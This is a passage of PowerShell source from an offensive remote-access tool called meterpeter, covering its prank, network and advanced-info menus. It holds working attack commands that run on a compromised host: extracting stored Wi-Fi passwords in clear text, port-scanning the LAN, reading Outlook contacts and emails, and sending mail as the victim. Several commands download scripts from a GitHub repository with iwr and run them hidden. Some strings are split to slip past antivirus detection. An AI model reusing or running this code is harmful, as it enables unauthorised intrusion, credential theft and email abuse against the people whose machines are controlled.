Description:\" -ForegroundColor Yellow;\r\n write-host \" This module makes remote host speak one sentence.\"\r\n write-host \"`n`n Modules Description Privileges Required\" -ForegroundColor green;\r\n write-host \" ------- ----------- -------------------\"\r\n write-host \" start speak input sentence UserLand\";\r\n write-host \" Return Return to Server Main Menu\" -ForeGroundColor yellow;\r\n write-host \"`n`n :meterpeter:Pranks:Speak> \" -NoNewline -ForeGroundColor Green;\r\n $Speak_choise = Read-Host;\r\n If($Speak_choise -ieq \"start\")\r\n {\r\n write-host \" - Input Frase for Remote-Host to Speak: \" -NoNewline;\r\n $MYSpeak = Read-Host;\r\n write-host \" * Executing speak prank.\" -ForegroundColor Green\r\n If(-not ($MYSpeak -ieq $False -or $MYSpeak -eq \"\"))\r\n {\r\n write-host \"\"\r\n $Mytype = \"Ad\" + \"d-Ty\" + \"pe \" + \"-Assembl\" + \"yName\" -join ''\r\n $Command = \"`$My_Line = `\"$MYSpeak`\";$Mytype System.speech;`$speak = New-Object System.Speech.Synthesis.SpeechSynthesizer;`$speak.Volume = 85;`$speak.Rate = -2;`$speak.Speak(`$My_Line);echo `\" `> Speak Frase: '$MYSpeak' ..`\" `> dellog.txt;Get-Content dellog.txt;Remove-Item dellog.txt -Force\";\r\n }\r\n Else\r\n {\r\n write-host \"\";\r\n $MYSpeak = \"Next time dont forget to input the text ok?\";\r\n $Mytype = \"Ad\" + \"d-Ty\" + \"pe \" + \"-Assembl\" + \"yName\" -join ''\r\n $Command = \"`$My_Line = `\"$MYSpeak`\";$Mytype System.speech;`$speak = New-Object System.Speech.Synthesis.SpeechSynthesizer;`$speak.Volume = 85;`$speak.Rate = -2;`$speak.Speak(`$My_Line);echo `\" `> Speak Frase: '$MYSpeak' ..`\" `> dellog.txt;Get-Content dellog.txt;Remove-Item dellog.txt -Force\";\r\n }\r\n }\r\n If($Speak_choise -ieq \"Return\" -or $Speak_choise -ieq \"cls\" -or $Speak_choise -ieq \"Modules\" -or $Speak_choise -ieq \"clear\")\r\n {\r\n $choise = $Null;\r\n $Command = $Null;\r\n $Speak_choise = $Null;\r\n }\r\n }\r\n If($choise -ieq \"OpenUrl\" -or $choise -ieq \"URL\")\r\n {\r\n write-host \"`n`n Description:\" -ForegroundColor Yellow\r\n write-host \" This module allow users to open one url link on default webbrowser.\"\r\n write-host \" It will open the browser or a new tab if the browser its allready up.\"\r\n write-host \"`n`n Modules Description Privileges Required\" -ForegroundColor green;\r\n write-host \" ------- ----------- -------------------\"\r\n write-host \" Open Url on default browser UserLand\";\r\n write-host \" Return Return to Server Main Menu\" -ForeGroundColor yellow\r\n write-host \"`n`n :meterpeter:Pranks:Url> \" -NoNewline -ForeGroundColor Green;\r\n $url_choise = Read-Host;\r\n If($url_choise -ieq \"Open\")\r\n {\r\n $UrlLink = Read-Host \" - Input URL to open\"\r\n If(-not($UrlLink) -or $UrlLink -ieq $null)\r\n {\r\n $UrlLink = \"https://mrdoob.com/projects/chromeexperiments/google-gravity\"\r\n Write-Host \" => Error: wrong input, set demo to '$UrlLink'\" -ForegroundColor Red\r\n }\r\n \r\n write-host \"\"\r\n $Command = \"Start-Process -WindowStyle Maximized `\"$UrlLink`\"|Out-Null;If(`$? -eq `\"True`\"){echo `\" `> Successfuly open URL: $UrlLink`\"|Out-File defbrowser.meterpeter;Start-Sleep -Seconds 1;Get-Content -Path defbrowser.meterpeter;Remove-Item -Path defbrowser.meterpeter -Force}Else{echo `\" `> Fail to open URL: $UrlLink`\"|Out-File defbrowser.meterpeter;Get-Content -Path defbrowser.meterpeter;Remove-Item -Path defbrowser.meterpeter -Force}\" \r\n $UrlLink = $null\r\n }\r\n If($url_choise -ieq \"Return\" -or $url_choise -ieq \"cls\" -or $url_choise -ieq \"modules\" -or $url_choise -ieq \"clear\")\r\n {\r\n $choise = $Null;\r\n $Command = $Null;\r\n $url_choise = $Null;\r\n }\r\n }\r\n If($choise -ieq \"GoogleX\")\r\n {\r\n write-host \"`n`n Description:\" -ForegroundColor Yellow;\r\n write-host \" Opens the default WebBrowser in sellected easter egg\";\r\n write-host \" Or opens a new Tab if the browser its allready open.\";\r\n write-host \"`n`n Modules Description Privileges Required\" -ForegroundColor green;\r\n write-host \" ------- ----------- -------------------\"\r\n write-host \" gravity Open Google-Gravity UserLand\";\r\n write-host \" sphere Open Google-Sphere UserLand\";\r\n write-host \" rotate Rotate webpage 360º UserLand\";\r\n write-host \" mirror Open Google-Mirror UserLand\";\r\n write-host \" teapot Open Google-teapot UserLand\";\r\n write-host \" invaders Open Invaders-Game UserLand\";\r\n write-host \" pacman Open Pacman-Game UserLand\";\r\n write-host \" rush Open Google-Zerg-Rush UserLand\";\r\n write-host \" moon Open Google-Moon UserLand\";\r\n write-host \" terminal Open Google-terminal UserLand\";\r\n write-host \" trexgame Open Google-tRexgame UserLand\";\r\n write-host \" googlespace Open google-space UserLand\";\r\n write-host \" kidscoding Open Google-kidscoding UserLand\";\r\n write-host \" Return Return to Server Main Menu\" -ForeGroundColor yellow;\r\n write-host \"`n`n :meterpeter:Pranks:GoogleX> \" -NoNewline -ForeGroundColor Green;\r\n $EasterEgg = Read-Host;\r\n If($EasterEgg -ieq \"terminal\")\r\n {\r\n write-host \"`n\";\r\n $cmdline = \"https://elgoog.im/terminal\"\r\n $Command = \"cmd /R start /max $cmdline;echo `\" `> Open: '$cmdline'`\" `> prank.txt;Get-content prank.txt;Remove-Item prank.txt -Force\";\r\n }\r\n If($EasterEgg -ieq \"trexgame\")\r\n {\r\n write-host \"`n\";\r\n $cmdline = \"https://elgoog.im/t-rex\"\r\n $Command = \"cmd /R start /max $cmdline;echo `\" `> Open: '$cmdline'`\" `> prank.txt;Get-content prank.txt;Remove-Item prank.txt -Force\";\r\n }\r\n If($EasterEgg -ieq \"kidscoding\")\r\n {\r\n write-host \"`n\";\r\n $cmdline = \"https://www.google.com/logos/2017/logo17/logo17.html\"\r\n $Command = \"cmd /R start /max $cmdline;echo `\" `> Open: '$cmdline'`\" `> prank.txt;Get-content prank.txt;Remove-Item prank.txt -Force\";\r\n }\r\n If($EasterEgg -ieq \"googlespace\")\r\n {\r\n write-host \"`n\";\r\n $cmdline = \"https://mrdoob.com/projects/chromeexperiments/google-space/\"\r\n $Command = \"cmd /R start /max $cmdline;echo `\" `> Open: '$cmdline'`\" `> prank.txt;Get-content prank.txt;Remove-Item prank.txt -Force\";\r\n }\r\n If($EasterEgg -ieq \"teapot\")\r\n {\r\n write-host \"`n\";\r\n $cmdline = \"https://www.google.com/teapot\"\r\n $Command = \"cmd /R start /max $cmdline;echo `\" `> Open: '$cmdline'`\" `> prank.txt;Get-content prank.txt;Remove-Item prank.txt -Force\";\r\n }\r\n If($EasterEgg -ieq \"sphere\")\r\n {\r\n write-host \"`n\";\r\n $cmdline = \"https://mrdoob.com/projects/chromeexperiments/google-sphere\"\r\n $Command = \"cmd /R start /max $cmdline;echo `\" `> Open: '$cmdline'`\" `> prank.txt;Get-content prank.txt;Remove-Item prank.txt -Force\";\r\n }\r\n If($EasterEgg -ieq \"gravity\")\r\n {\r\n write-host \"`n\";\r\n $cmdline = \"https://mrdoob.com/projects/chromeexperiments/google-gravity\"\r\n $Command = \"cmd /R start /max $cmdline;echo `\" `> Open: '$cmdline'`\" `> prank.txt;Get-content prank.txt;Remove-Item prank.txt -Force\";\r\n }\r\n If($EasterEgg -ieq \"rotate\")\r\n {\r\n write-host \" - Execute it how many times? : \" -NoNewline;\r\n $LoopRange = Read-Host;\r\n If(-not($LoopRange) -or $LoopRange -eq $null)\r\n {\r\n $LoopRange = \"1\"\r\n }\r\n\r\n If($LoopRange -gt 1)\r\n {\r\n\r\n write-host \" - Secs before the next loop? : \" -NoNewline;\r\n $LoopDelay = Read-Host;\r\n If(-not($LoopDelay) -or $LoopDelay -eq $null)\r\n {\r\n $LoopDelay = \"20\"\r\n }\r\n }\r\n Else\r\n {\r\n $LoopDelay = \"5\"\r\n }\r\n\r\n write-host \"`n\";\r\n $cmdline = \"https://www.google.com/search?q=do+a+barrel+roll\"\r\n $Command = \"cd `$Env:TMP;iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/Misc-CmdLets/Prank2.ps1`\" -OutFile `\"`$Env:TMP\\Prank2.ps1`\"|Unblock-File;Start-Process -WindowStyle Hidden powershell -ArgumentList `\"powershell -File `$Env:TMP\\Prank2.ps1 -StartDelay '3' -LoopRange $LoopRange -LoopDelay $LoopDelay`\";echo `\" `> Open: '$cmdline'`\" `> prank.txt;Get-content prank.txt;Remove-Item prank.txt -Force\";\r\n }\r\n If($EasterEgg -ieq \"rush\")\r\n {\r\n write-host \"`n\";\r\n $cmdline = \"https://elgoog.im/zergrush/\"\r\n $Command = \"cmd /R start /max $cmdline;echo `\" `> Open: '$cmdline'`\" `> prank.txt;Get-content prank.txt;Remove-Item prank.txt -Force\";\r\n }\r\n If($EasterEgg -ieq \"moon\")\r\n {\r\n write-host \"`n\";\r\n $cmdline = \"https://www.google.com/moon/\"\r\n $Command = \"cmd /R start /max $cmdline;echo `\" `> Open: '$cmdline'`\" `> prank.txt;Get-content prank.txt;Remove-Item prank.txt -Force\";\r\n }\r\n If($EasterEgg -ieq \"mirror\")\r\n {\r\n write-host \"`n\";\r\n $cmdline = \"https://elgoog.im/google-mirror/\"\r\n $Command = \"cmd /R start /max $cmdline;echo `\" `> Open: '$cmdline'`\" `> prank.txt;Get-content prank.txt;Remove-Item prank.txt -Force\";\r\n }\r\n If($EasterEgg -ieq \"pacman\")\r\n {\r\n write-host \"`n\";\r\n $cmdline = \"https://elgoog.im/pacman/\"\r\n $Command = \"cmd /R start /max $cmdline;echo `\" `> Open: '$cmdline'`\" `> prank.txt;Get-content prank.txt;Remove-Item prank.txt -Force\";\r\n }\r\n If($EasterEgg -ieq \"invaders\")\r\n {\r\n write-host \"`n\";\r\n $cmdline = \"https://elgoog.im/space-invaders/\"\r\n $Command = \"cmd /R start /max $cmdline;echo `\" `> Open: '$cmdline'`\" `> prank.txt;Get-content prank.txt;Remove-Item prank.txt -Force\";\r\n } \r\n If($EasterEgg -ieq \"Return\" -or $EasterEgg -ieq \"cls\" -or $EasterEgg -ieq \"Modules\" -or $EasterEgg -ieq \"clear\")\r\n {\r\n $choise = $Null;\r\n $Command = $Null;\r\n }\r\n $EasterEgg = $Null;\r\n }\r\n If($choise -ieq \"return\" -or $choise -ieq \"cls\" -or $choise -ieq \"modules\")\r\n {\r\n $Command = $Null;\r\n }\r\n $choise = $Null;\r\n $Clear = $True;\r\n }\r\n\r\n If($Command -iMatch '^(Net|NetScanner)$')\r\n {\r\n write-host \"`n`n Description:\" -ForegroundColor Yellow;\r\n write-host \" Remote network manager\";\r\n write-host \"`n`n Modules Description\" -ForegroundColor green;\r\n write-host \" ------- -----------\";\r\n write-host \" ListDNS List remote host Domain Name entrys\";\r\n write-host \" TCPinfo List remote host TCP\\UDP connections\";\r\n write-host \" ListWifi List remote host Profiles/SSID/Passwords\";\r\n write-host \" PingScan List devices ip addr\\ports\\dnsnames on Lan\";\r\n write-host \" GeoLocate List Client GeoLocation curl \\ ifconfig.me\";\r\n write-host \" Return Return to Server Main Menu\" -ForeGroundColor yellow\r\n write-host \"`n`n :meterpeter:Net> \" -NoNewline -ForeGroundColor Green;\r\n $choise = Read-Host;\r\n If($choise -ieq \"ListDNS\" -or $choise -ieq \"dns\")\r\n {\r\n write-host \" * Remote host DNS entrys.`n\" -ForegroundColor Green;Start-Sleep -Seconds 1\r\n $Command = \"Get-DnsClientCache|Select-Object Entry,Name,DataLength,Data|Format-Table -AutoSize > dns.txt;`$TestData = Get-Content dns.txt;If([string]::IsNullOrEmpty(`$TestData)){echo `\" `> None remote DNS cache entrys found!`\" `> dns.txt};Get-Content dns.txt;remove-item dns.txt -Force\";\r\n }\r\n If($choise -ieq \"TCPinfo\" -or $choise -ieq \"TCP\")\r\n {\r\n write-host \"`n`n Description:\" -ForegroundColor Yellow\r\n write-host \" This module enumerate ESTABLISHED TCP\\UDP connections\"\r\n write-host \" DNS Address Ip address, Hotnames and TCP Routing Table\"\r\n write-host \"`n`n Modules Description Privileges Required\" -ForegroundColor green;\r\n write-host \" ------- ----------- -------------------\";\r\n write-host \" Stats Query IPv4 Statistics UserLand\";\r\n write-host \" Query Established TCP connections UserLand\";\r\n write-host \" Verbose Query TCP\\UDP\\DNS\\ARP cache UserLand\";\r\n write-host \" Return Return to Server Main Menu\" -ForeGroundColor yellow\r\n write-host \"`n`n :meterpeter:Net:Tcp> \" -NoNewline -ForeGroundColor Green;\r\n $ConManager_choise = Read-Host;\r\n If($ConManager_choise -ieq \"Stats\")\r\n {\r\n write-host \" * Enumerating TCP statatistiscs.\" -ForegroundColor Green\r\n $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/GetConnections.ps1`\" -OutFile `\"`$Env:TMP\\GetConnections.ps1`\"|Out-Null;powershell -W 1 -file `$Env:TMP\\GetConnections.ps1 -Action Stats;Start-Sleep -Seconds 1;Remove-Item -Path `$Env:TMP\\GetConnections.ps1 -Force\" \r\n }\r\n If($ConManager_choise -ieq \"Query\")\r\n {\r\n write-host \" * Established TCP connections.`n\" -ForegroundColor Green\r\n $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/GetConnections.ps1`\" -OutFile `\"`$Env:TMP\\GetConnections.ps1`\"|Out-Null;powershell -W 1 -file `$Env:TMP\\GetConnections.ps1 -Action Enum;Start-Sleep -Seconds 1;Remove-Item -Path `$Env:TMP\\GetConnections.ps1 -Force\"\r\n }\r\n If($ConManager_choise -ieq \"Verbose\")\r\n {\r\n write-host \" * Established TCP\\UDP connections.`n\" -ForegroundColor Green\r\n $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/GetConnections.ps1`\" -OutFile `\"`$Env:TMP\\GetConnections.ps1`\"|Out-Null;powershell -W 1 -file `$Env:TMP\\GetConnections.ps1 -Action Verbose;Start-Sleep -Seconds 1;Remove-Item -Path `$Env:TMP\\GetConnections.ps1 -Force\"\r\n }\r\n If($ConManager_choise -ieq \"Return\" -or $ConManager_choise -ieq \"cls\" -or $ConManager_choise -ieq \"Modules\" -or $ConManager_choise -ieq \"clear\")\r\n {\r\n $choise = $Null;\r\n $Command = $Null;\r\n $ConManager_choise = $Null;\r\n }\r\n }\r\n If($choise -ieq \"ListWifi\" -or $choise -ieq \"wifi\")\r\n {\r\n write-host \"`n`n Remark:\" -ForegroundColor Yellow\r\n write-host \" Use single quotes if profile contains empty spaces.\"\r\n write-host \"`n`n Modules Description Privileges Required\" -ForegroundColor green;\r\n write-host \" ------- ----------- -------------------\";\r\n write-host \" ListProf Remote-Host wifi Profile UserLand\";\r\n write-host \" ListNetw List wifi Available networks UserLand\";\r\n write-host \" ListSSID List Remote-Host SSID Entrys UserLand\";\r\n write-host \" SSIDPass Extract Stored SSID passwords UserLand\";\r\n write-host \" Return Return to Server Main Menu\" -ForeGroundColor yellow;\r\n write-host \"`n`n :meterpeter:Net:Wifi> \" -NoNewline -ForeGroundColor Green;\r\n $wifi_choise = Read-Host;\r\n If($wifi_choise -ieq \"ListProf\" -or $wifi_choise -ieq \"prof\")\r\n {\r\n write-host \" * Remote-Host Profile Statistics.\" -ForegroundColor Green;Start-Sleep -Seconds 1\r\n $Command = \"cmd /R Netsh WLAN show interface `> pro.txt;`$check_tasks = Get-content pro.txt;If(-not (`$check_tasks)){echo `\" [i] meterpeter Failed to retrieve wifi profile ..`\" `> dellog.txt;Get-Content dellog.txt;Remove-Item dellog.txt -Force;Remove-Item pro.txt -Force}else{Get-Content pro.txt;Remove-Item pro.txt -Force}\"; \r\n }\r\n If($wifi_choise -ieq \"ListNetw\" -or $wifi_choise -ieq \"netw\")\r\n {\r\n write-host \" * List Available wifi Networks.\" -ForegroundColor Green;Start-Sleep -Seconds 1\r\n $Command = \"cmd /R Netsh wlan show networks `> pro.txt;`$check_tasks = Get-content pro.txt;If(-not (`$check_tasks)){echo `\" [i] None networks list found in: $Remote_Host`\" `> dellog.txt;Get-Content dellog.txt;Remove-Item dellog.txt -Force;Remove-Item pro.txt -Force}else{Get-Content pro.txt;Remove-Item pro.txt -Force}\"; \r\n }\r\n If($wifi_choise -ieq \"ListSSID\" -or $wifi_choise -ieq \"ssid\")\r\n {\r\n write-host \" * List of Remote-Host SSID profiles.\" -ForegroundColor Green;Start-Sleep -Seconds 1\r\n $Command = \"cmd /R Netsh WLAN show profiles `> ssid.txt;`$check_tasks = Get-content ssid.txt;If(-not (`$check_tasks)){echo `\" [i] None SSID profile found in: $Remote_Host`\" `> dellog.txt;Get-Content dellog.txt;Remove-Item dellog.txt -Force;Remove-Item ssid.txt -Force}else{Get-Content ssid.txt;Remove-Item ssid.txt -Force}\";\r\n }\r\n If($wifi_choise -ieq \"SSIDPass\" -or $wifi_choise -ieq \"pass\")\r\n {\r\n write-host \" - Sellect WIFI Profile: \" -ForegroundColor Red -NoNewline;\r\n $profile = Read-Host;\r\n If(-not ($profile) -or $profile -eq \" \")\r\n {\r\n write-host \" => Error: None Profile Name provided ..\" -ForegroundColor red -BackGroundColor white;\r\n write-host \" => Usage: meterpeter> AdvInfo -> WifiPass -> ListSSID (to List Profiles).\" -ForegroundColor red -BackGroundColor white;write-host \"`n`n\";\r\n Start-Sleep -Seconds 4;\r\n $Command = $Null;\r\n $profile = $Null;\r\n }else{\r\n write-host \" * Extracting SSID Password.\" -ForegroundColor Green;Start-Sleep -Seconds 1\r\n $Command = \"cmd /R netsh wlan show profile $profile Key=Clear `> key.txt;Get-Content key.txt;Remove-Item key.txt -Force\"\r\n }\r\n $profile = $Null;\r\n }\r\n If($wifi_choise -ieq \"Return\" -or $wifi_choise -ieq \"return\" -or $wifi_choise -ieq \"cls\" -or $wifi_choise -ieq \"Modules\" -or $wifi_choise -ieq \"modules\" -or $wifi_choise -ieq \"clear\")\r\n {\r\n $choise = $Null;\r\n $Command = $Null;\r\n }\r\n $choise = $Null;\r\n $wifi_choise = $Null;\r\n }\r\n If($choise -ieq \"PingScan\" -or $choise -ieq \"Ping\")\r\n {\r\n write-host \"`n`n Description:\" -ForegroundColor Yellow;\r\n write-host \" Module to scan local lan for active ip addreses\";\r\n write-host \" or open ports if sellected the 'portscan' module.\";\r\n write-host \" Remark: maxports portscan takes aprox 4 minutes.\" -ForeGroundColor yellow\r\n write-host \"`n`n Modules Description Privileges Required\" -ForegroundColor green;\r\n write-host \" ------- ----------- ------------------\";\r\n write-host \" Enum List active ip addresses on local Lan UserLand\";\r\n write-host \" PortScan Single ip port scanner \\ dns resolver UserLand\";\r\n write-host \" Return Return to Server Main Menu\" -ForeGroundColor yellow;\r\n write-host \"`n`n :meterpeter:Net:Ping> \" -NoNewline -ForeGroundColor Green;\r\n $ping_choise = Read-Host;\r\n If($ping_choise -ieq \"Enum\")\r\n {\r\n Write-Host \" - Ip addr range to scan (1,255): \" -ForegroundColor Red -NoNewline\r\n $IpRange = Read-Host;\r\n If($IpRange -eq $null -or $IpRange -NotMatch ',')\r\n {\r\n $TimeOut = \"300\"\r\n $IpRange = \"1,255\"\r\n Write-Host \" => Error: wrong iprange, set demo to '$IpRange' ..\" -ForegroundColor Red\r\n Write-Host \" * Remark: full scan takes aprox 2 minutes to finish.\" -ForegroundColor Yellow\r\n }\r\n Else\r\n {\r\n $TimeOut = \"300\" #Faster discovery mode\r\n }\r\n\r\n #Execute command remotely\r\n Write-Host \" * Scanning Lan for active devices!\" -ForegroundColor Green\r\n $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/PingSweep.ps1`\" -OutFile `\"`$Env:TMP\\PingSweep.ps1`\"|Out-Null;powershell -File `$Env:TMP\\PingSweep.ps1 -Action Enum -IpRange `\"$IpRange`\" -TimeOut `\"$TimeOut`\" -Egg True;Remove-Item -Path `$Env:TMP\\PingSweep.ps1 -Force\"\r\n }\r\n If($ping_choise -ieq \"PortScan\")\r\n {\r\n Write-Host \" - Input ip address to scan ($Local_Host) : \" -ForegroundColor Red -NoNewline\r\n $IpRange = Read-Host;\r\n If($IpRange -NotMatch '^(\\d+\\d+\\d+)\\.(\\d+\\d+\\d+).')\r\n {\r\n $IpRange = \"$Local_Host\"\r\n Write-Host \" => Error: wrong iprange, set demo to '$IpRange' ..\" -ForegroundColor Red\r\n }\r\n\r\n Write-Host \" - Set scantype (bullet|topports|maxports) : \" -NoNewline\r\n $ScanType = Read-Host;\r\n If($ScanType -iNotMatch '^(bullet|TopPorts|MaxPorts)$')\r\n {\r\n $ScanType = \"topports\"\r\n Write-Host \" => Error: wrong scantype, set demo to '$ScanType' ..\" -ForegroundColor Red\r\n }\r\n\r\n #Execute command remotely\r\n Write-Host \" * Scanning '\" -ForegroundColor Green -NoNewline\r\n Write-Host \"$IpRange\" -ForegroundColor Red -NoNewline\r\n Write-Host \"' ports\\services!\" -ForegroundColor Green\r\n $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/PingSweep.ps1`\" -OutFile `\"`$Env:TMP\\PingSweep.ps1`\"|Out-Null;powershell -File `$Env:TMP\\PingSweep.ps1 -Action PortScan -IpRange `\"$IpRange`\" -ScanType $ScanType -OutPut verbose -Egg True;Remove-Item -Path `$Env:TMP\\PingSweep.ps1 -Force\"\r\n }\r\n If($ping_choise -ieq \"Return\" -or $ping_choise -ieq \"cls\" -or $ping_choise -ieq \"Modules\")\r\n {\r\n $ping_choise = $null\r\n $Command = $Null;\r\n }\r\n }\r\n If($choise -ieq \"GeoLocate\" -or $choise -ieq \"GEO\")\r\n {\r\n write-host \"`n`n Description:\" -ForegroundColor Yellow;\r\n write-host \" Geo locate remote host and resolve public ip addr\";\r\n write-host \"`n`n Modules Description Privileges Required\" -ForegroundColor green;\r\n write-host \" ------- ----------- ------------------\";\r\n write-host \" GeoLocate Client GeoLocation using curl UserLand\";\r\n write-host \" ifconfig Client GeoLocation using ipinfo UserLand\";\r\n write-host \" Return Return to Server Main Menu\" -ForeGroundColor yellow;\r\n write-host \"`n`n :meterpeter:Net:Geo> \" -NoNewline -ForeGroundColor Green;\r\n $Geo_choise = Read-Host;\r\n If($Geo_choise -ieq \"GeoLocate\")\r\n {\r\n Write-Host \" - Resolve public ip addr? (y|n): \" -NoNewline;\r\n $PublicIpSettings = Read-Host;\r\n If($PublicIpSettings -iMatch '^(y|yes)$')\r\n {\r\n #Execute command remotely\r\n Write-Host \" * Scanning remote host geo location!\" -ForegroundColor Green\r\n $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/GeoLocation.ps1`\" -OutFile `\"`$Env:TMP\\GeoLocation.ps1`\"|Out-Null;powershell -File `$Env:TMP\\GeoLocation.ps1 -HiddeMyAss false;Remove-Item -Path `$Env:TMP\\GeoLocation.ps1 -Force\"\r\n }\r\n Else\r\n {\r\n #Execute command remotely\r\n Write-Host \" * Scanning remote host geo location!\" -ForegroundColor Green\r\n $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/GeoLocation.ps1`\" -OutFile `\"`$Env:TMP\\GeoLocation.ps1`\"|Out-Null;powershell -File `$Env:TMP\\GeoLocation.ps1 -HiddeMyAss true;Remove-Item -Path `$Env:TMP\\GeoLocation.ps1 -Force\"\r\n }\r\n }\r\n If($Geo_choise -ieq \"ifconfig\")\r\n {\r\n Write-Host \" - Resolve public ip addr? (y|n) : \" -NoNewline;\r\n $PublicIpSettings = Read-Host;\r\n Write-Host \" - Display verbose outputs? (y|n): \" -NoNewline;\r\n $Verboseme = Read-Host;\r\n If($Verboseme -iMatch '^(y|yes)$')\r\n {\r\n $Verboseme = \"true\"\r\n }\r\n Else\r\n {\r\n $Verboseme = \"false\" \r\n }\r\n\r\n If($PublicIpSettings -iMatch '^(y|yes)$')\r\n {\r\n #Execute command remotely\r\n Write-Host \" * Scanning remote host geo location!\" -ForegroundColor Green\r\n $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/Exfiltration/Get-ComputerGeoLocation.ps1`\" -OutFile `\"`$Env:TMP\\Get-ComputerGeoLocation.ps1`\";powershell -File `$Env:TMP\\Get-ComputerGeoLocation.ps1 -Api 'ifconfig' -Detail $Verboseme -PublicAddr false;Remove-Item -Path `$Env:TMP\\Get-ComputerGeoLocation.ps1 -Force\"\r\n }\r\n Else\r\n {\r\n #Execute command remotely\r\n Write-Host \" * Scanning remote host geo location!\" -ForegroundColor Green\r\n $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/Exfiltration/Get-ComputerGeoLocation.ps1`\" -OutFile `\"`$Env:TMP\\Get-ComputerGeoLocation.ps1`\";powershell -File `$Env:TMP\\Get-ComputerGeoLocation.ps1 -Api 'ifconfig' -Detail $Verboseme -PublicAddr true;Remove-Item -Path `$Env:TMP\\Get-ComputerGeoLocation.ps1 -Force\"\r\n }\r\n }\r\n If($Geo_choise -ieq \"Return\" -or $Geo_choise -ieq \"cls\" -or $Geo_choise -ieq \"Modules\")\r\n {\r\n $Geo_choise = $null\r\n $Command = $Null;\r\n }\r\n }\r\n If($choise -ieq \"return\" -or $choise -ieq \"cls\" -or $choise -ieq \"modules\")\r\n {\r\n $Command = $Null;\r\n }\r\n \r\n }\r\n\r\n If($Command -ieq \"AdvInfo\" -or $Command -ieq \"adv\")\r\n {\r\n write-host \"`n`n Description:\" -ForegroundColor Yellow;\r\n write-host \" Advanced info manager\";\r\n write-host \"`n`n Modules Description\" -ForegroundColor green;\r\n write-host \" ------- -----------\";\r\n write-host \" Accounts List remote host accounts\";\r\n write-host \" RevS`hell List client shell information\";\r\n write-host \" ListAppl List remote host installed appl\";\r\n write-host \" Processes List remote host processes info\";\r\n write-host \" Tasks List remote host schedule tasks\";\r\n write-host \" Drives List remote host mounted drives\";\r\n write-host \" Browser List remote host installed browsers\";\r\n write-host \" Recent List remote host recent directory\";\r\n write-host \" ListSMB List remote host SMB names\\shares\";\r\n write-host \" StartUp List remote host startUp directory\";\r\n write-host \" ListRun List remote host startup run entrys\";\r\n write-host \" AntiVirus Enumerate all EDR Products installed\";\r\n write-host \" FRManager Manage remote 'active' firewall rules\";\r\n write-host \" OutLook Manage OutLook Exchange Email Objects\";\r\n write-host \" Return Return to Server Main Menu\" -ForeGroundColor yellow;\r\n write-host \"`n`n :meterpeter:Adv> \" -NoNewline -ForeGroundColor Green;\r\n $choise = Read-Host;\r\n ## Runing sellected Module(s).\r\n If($choise -ieq \"OutLook\")\r\n {\r\n write-host \"`n`n Description:\" -ForegroundColor Yellow;\r\n write-host \" Module to enumerate OutLook Exchange Emails, Read is contents\";\r\n write-host \" on terminal console or dump found Email Objects to a logfile.\";\r\n write-host \" If invoked -SemdMail then target address will be used as Sender.\" -ForegroundColor Yellow;\r\n write-host \"`n`n Modules Description Privileges Required\" -ForegroundColor green;\r\n write-host \" ------- ----------- ------------------\";\r\n write-host \" Folders Display outlook folder names UserLand\";\r\n write-host \" Contacts Display outlook contacts info UserLand\";\r\n write-host \" Emails Display outlook email objects UserLand\";\r\n write-host \" SendMail Send Email using target domain UserLand\";\r\n write-host \" Return Return to Server Main Menu\" -ForeGroundColor yellow;\r\n write-host \"`n`n :meterpeter:Adv:OutLook> \" -NoNewline -ForeGroundColor Green;\r\n $OutLook_choise = Read-Host;\r\n If($OutLook_choise -ieq \"Folders\")\r\n {\r\n #Execute command remotely\r\n Write-Host \" * Scanning OutLook for folder names!\" -ForegroundColor Green\r\n $Command = \"If((Get-MpComputerStatus).RealTimeProtectionEnabled -ieq `\"True`\"){iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/ReadEmails.ps1`\" -OutFile `\"`$Env:TMP\\ReadEmails.ps1`\"|Out-Null;powershell -File `$Env:TMP\\ReadEmails.ps1 -action 'folders' -Egg `\"True`\";Remove-Item -Path `$Env:TMP\\ReadEmails.ps1 -Force}Else{echo '';echo `\" `> Error: Outlook does not let us manipulate it if 'RealTimeProtection' its disable`\" `> `$Env:TMP\\fsddsvd.log;Get-Content -Path `\"`$Env:TMP\\fsddsvd.log`\";Remove-Item -Path `\"`$Env:TMP\\fsddsvd.log`\" -Force}\";\r\n }\r\n If($OutLook_choise -ieq \"Contacts\")\r\n {\r\n Write-Host \" - Max outlook items to display: \" -NoNewline;\r\n $MaxOfObjectsToDisplay = Read-Host;\r\n If(-not($MaxOfObjectsToDisplay) -or $MaxOfObjectsToDisplay -ieq $null)\r\n {\r\n $MaxOfObjectsToDisplay = \"5\" #Default cmdlet parameter\r\n }\r\n\r\n Write-Host \" - Create report logfile? (y|n): \" -NoNewline;\r\n $CreateLogFileSetting = Read-Host;\r\n If($CreateLogFileSetting -iMatch '^(y|yes)$')\r\n {\r\n $CreateLogFileSetting = \"True\"\r\n }\r\n Else\r\n {\r\n $CreateLogFileSetting = \"False\" \r\n }\r\n\r\n #Execute command remotely\r\n Write-Host \" * Scanning OutLook for Contact Objects\" -ForegroundColor Green\r\n $Command = \"If((Get-MpComputerStatus).RealTimeProtectionEnabled -ieq `\"True`\"){iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/ReadEmails.ps1`\" -OutFile `\"`$Env:TMP\\ReadEmails.ps1`\"|Out-Null;powershell -File `$Env:TMP\\ReadEmails.ps1 -action 'contacts' -maxitems '$MaxOfObjectsToDisplay' -logfile `\"$CreateLogFileSetting`\" -Egg `\"True`\";Remove-Item -Path `$Env:TMP\\ReadEmails.ps1 -Force}Else{echo '';echo `\" `> Error: Outlook does not let us manipulate it if 'RealTimeProtection' 